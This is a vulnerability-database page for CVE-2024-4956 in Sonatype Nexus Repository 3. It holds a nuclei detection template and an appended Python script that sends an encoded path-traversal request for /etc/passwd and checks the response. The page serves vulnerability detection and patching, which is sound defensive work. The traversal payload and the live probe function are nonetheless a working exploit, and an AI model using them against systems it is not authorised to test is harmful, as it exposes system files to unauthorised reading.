Sonatype Nexus Repository Manager 3 - Local File Inclusion

Published: 03 Jul 2026 13:39:16
Reported by: ProjectDiscovery
Type: nuclei
Source: github.com
Views: 424

Sonatype Nexus Repository Manager 3 - Local File Inclusion vulnerability (path traversal, CVE-2024-4956), allowing an unauthenticated attacker to read system files. Fixed in version 3.68.1.

Related

Reporter        Title                        Published           Family
GithubExploit   Exploit for CVE-2024-4956    23 May 2024 11:39   githubexploit
GithubExploit   Exploit for CVE-2024-4956    23 May 2024 06:47   githubexploit
GithubExploit   Exploit for CVE-2024-4956    23 May 2024 06:47   githubexploit
GithubExploit   Exploit for CVE-2024-4956    14 Aug 2024 16:41   githubexploit
GithubExploit   Exploit for CVE-2024-4956    12 Dec 2024 04:05   githubexploit
GithubExploit   Exploit for CVE-2024-4956    26 Sep 2024 15:05   githubexploit
GithubExploit   Exploit for CVE-2024-4956    9 Jun 2024 10:57    githubexploit
GithubExploit   Exploit for CVE-2024-4956    5 Jun 2024 15:37    githubexploit
GithubExploit   Exploit for CVE-2024-4956    26 May 2024 06:50   githubexploit
GithubExploit   Exploit for CVE-2024-4956    28 May 2024 15:05   githubexploit

Code
id: CVE-2024-4956

info:
  name: Sonatype Nexus Repository Manager 3 - Local File Inclusion
  author: ritikchaddha
  severity: high
  description: |
    Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
  impact: |
    Unauthenticated attackers can read arbitrary system files via path traversal in Sonatype Nexus Repository.
  remediation: |
    Update Sonatype Nexus Repository 3 to version 3.68.1 or later.
  reference:
    - https://x.com/phithon_xg/status/1793517567560335428?s=46&t=GMMfJwV8rhJHdcj2TUympg
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4956
    - https://support.sonatype.com/hc/en-us/articles/29416509323923
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-4956
    cwe-id: CWE-22
    epss-score: 0.18245
    epss-percentile: 0.96863
    cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sonatype
    product: nexus
    fofa-query:
      - title="Nexus Repository Manager"
      - title="nexus repository manager"
  tags: cve,cve2024,nexus,lfi,sonatype,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - contains(header, "application/octet-stream")
          - status_code == 200
        condition: and
# digest: 490a0046304402207ee90ebe316afc4c2610221caa879f3ea4618c6c8b35831b5da52ec60121b26f0220280df3057b12d70bc053ebecaad791b3810068bba8cb42a2719d4352b5525779:922c64590222798bb761d5b6d8e72950
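The probe path and the three matchers from the template above, reproduced in Python as an added example (this is not code from the nuclei template, ProjectDiscovery or Vulners). It shows what the percent-encoded path collapses to once the server decodes it, evaluates the same status/header/body conditions the template joins with `and`, and adds a version comparison against the 3.68.1 fix level named in the remediation. The Nexus version string format ("3.67.1-01") accepted by parse_nexus_version() is an assumption; the sample responses are constructed, not captures.

```python
"""Added example: the CVE-2024-4956 nuclei probe and matchers in Python.
Not part of the template or the Vulners page. The 'major.minor.patch-build'
version format is assumed; sample responses below are constructed."""
import posixpath
import re
from urllib.parse import unquote

# Probe path copied verbatim from the template's http.path entry.
TEMPLATE_PATH = "/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
TRAVERSAL_STEPS = TEMPLATE_PATH.count("..%2F")
# Leading encoded slashes: every %2F except those inside "..%2F" and the one in "etc%2Fpasswd".
SLASH_PADDING = TEMPLATE_PATH.count("%2F") - TRAVERSAL_STEPS - 1
FIXED_VERSION = (3, 68, 1)  # remediation level from the template


def build_probe_path(target="etc/passwd", padding=SLASH_PADDING, steps=TRAVERSAL_STEPS):
    """Rebuild the template's probe: leading encoded slashes, then encoded '../'
    segments, then the target file with its own slashes percent-encoded."""
    return "/" + "%2F" * padding + "..%2F" * steps + target.replace("/", "%2F")


def decoded_target(path):
    """What the probe collapses to after percent-decoding and dot-segment
    normalisation; the slash padding only survives as redundant separators."""
    return posixpath.normpath(unquote(path))


def matches_template(status_code, headers, body):
    """The template's three matchers joined with 'and': HTTP 200,
    application/octet-stream somewhere in the raw header block, and a
    passwd-style root line in the body."""
    raw_headers = "\n".join(f"{k}: {v}" for k, v in headers.items())
    return (
        status_code == 200
        and "application/octet-stream" in raw_headers
        and re.search(r"root:.*:0:0:", body) is not None
    )


def parse_nexus_version(version):
    """'3.67.1-01' -> (3, 67, 1); the build suffix after '-' is ignored (assumed format)."""
    core = version.split("-")[0]
    return tuple(int(part) for part in core.split("."))


def version_is_fixed(version):
    """True when the version is 3.68.1 or later, per the template's remediation."""
    return parse_nexus_version(version) >= FIXED_VERSION


def probe(base_url, timeout=10):
    """Send the live probe (needs the requests library and network access)."""
    import requests  # imported here so the rest of the module runs offline
    url = base_url.rstrip("/") + build_probe_path()
    resp = requests.get(url, timeout=timeout, allow_redirects=False)
    return matches_template(resp.status_code, resp.headers, resp.text)


# Constructed sample responses (not real captures) for an offline self-check.
VULNERABLE_RESPONSE = (200, {"Content-Type": "application/octet-stream"},
                       "root:x:0:0:root:/root:/bin/bash\n")
LOGIN_PAGE_RESPONSE = (200, {"Content-Type": "text/html"},
                       "<html><title>Nexus Repository Manager</title></html>")

if __name__ == "__main__":
    print(decoded_target(TEMPLATE_PATH))
    print(matches_template(*VULNERABLE_RESPONSE), matches_template(*LOGIN_PAGE_RESPONSE))
    print(version_is_fixed("3.67.1-01"), version_is_fixed("3.68.1-01"))
```

A login page that happens to return 200 does not match because the Content-Type check and the passwd regex both fail; requiring all three conditions is what keeps the template's false-positive rate low. Run probe() only against hosts you are authorised to test.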


Scores (current as of 04 Feb 2026 07:00)
Vulners AI Score: 7.1 (High risk)
CVSS 3.1: 7.5
EPSS: 0.18245
Views: 424